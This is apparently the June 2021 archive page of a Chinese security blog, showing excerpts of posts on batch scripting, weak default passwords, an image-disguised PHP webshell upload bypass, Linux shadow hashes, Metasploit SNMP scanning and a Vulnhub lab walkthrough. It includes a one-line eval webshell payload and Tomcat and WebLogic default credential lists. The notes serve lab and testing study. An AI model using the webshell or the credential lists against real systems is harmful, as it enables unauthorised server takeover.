路漫漫其修远兮,吾将上下而求索

导航

06 2021 档案

批处理的个人日常使用集锦(持续更新)bat、cmd
摘要:做一个批处理的常见批量操作集合(之前的忘记写了,从现在开始一点点记下来,以前xp时代写过不少工具,有内网群扫ip并验证开机的,autorun病毒清除的,杀毒的,文件目录管理的等等) chcp 65001 采用utf-8编码,支持中文,解决乱码 1、复制当前目录下的1.xls到当前目录下的所有子目录中 阅读全文

posted @ 2021-06-28 23:48 爱在西元间 阅读(156) 评论(0) 推荐(0)

弱口令汇总
摘要:日常弱口令 123456 admin password admin@123 88888888 12345678 tomcat后台常见弱口令 用户名: tomcat admin 口令: tomcat admin 123456 admin123 weblogic常见默认口令 weblogic:Oracl 阅读全文

posted @ 2021-06-28 22:09 爱在西元间 阅读(178) 评论(0) 推荐(0)

php一句话图片马上传绕过
摘要:主页 burpsuite截获,修改后缀为php,末尾加上一句话马(内容开头一定要是图片文件标志头),上传成功并返回路径 <?php @eval($_POST['c']);?> 其他测试: 1、删掉部分图片内容时(图片文件头不对),无法上传 2、可以修改图片文件头为gif文件的标志头:GIF87a或者 阅读全文

posted @ 2021-06-28 14:01 爱在西元间 阅读(4760) 评论(0) 推荐(0)

linux口令文件shadow加密复现
摘要:创建测试账号abc,口令abcdefg useradd abcpasswd abc cat /etc/shadow 查看系统生成的口令 abc:$6$IIxEKxve$fRj6OFj7I4SqgdN6fVTFOHt8UVLpBNN50QbYp4MrS9SuX2Zi/J8qfDhfdRepQF4gBB 阅读全文

posted @ 2021-06-25 17:10 爱在西元间 阅读(274) 评论(0) 推荐(0)

linux系统使用screen工具恢复断开的会话
摘要:服务器环境是Debian 初次需要下载安装 apt-get install screen 所有参数 Use: screen [-opts] [cmd [args]] or: screen -r [host.tty] Options: -4 Resolve hostnames only to IPv4 阅读全文

posted @ 2021-06-25 16:58 爱在西元间 阅读(691) 评论(0) 推荐(0)

snmp协议漏洞的msf利用
摘要:利用msf的snmp扫描模块 use auxiliary/scanner/snmp/snmp_login options 看下选项,填ip即可,端口默认161set rhosts ip run use auxiliary/scanner/snmp/snmp_enumoptionsset rhosts 阅读全文

posted @ 2021-06-25 10:35 爱在西元间 阅读(962) 评论(0) 推荐(0)

burpsuite Intruder结果导出为excel
摘要: 阅读全文

posted @ 2021-06-09 13:18 爱在西元间 阅读(1191) 评论(0) 推荐(0)

Vulnhub靶场presidential1靶场
摘要:vmware中配置桥接模式,自动获取外网卡同网段ip地址 用nmap扫描同网段设备ip,发现192.168.1.250 继续用nmap扫描端口,一开始用-sV参数没找到,换成-sS后发现80和2082端口 nmap -sS -p0-65535 192.168.1.250 访问web看看 用dirse 阅读全文

posted @ 2021-06-07 22:33 爱在西元间 阅读(130) 评论(0) 推荐(0)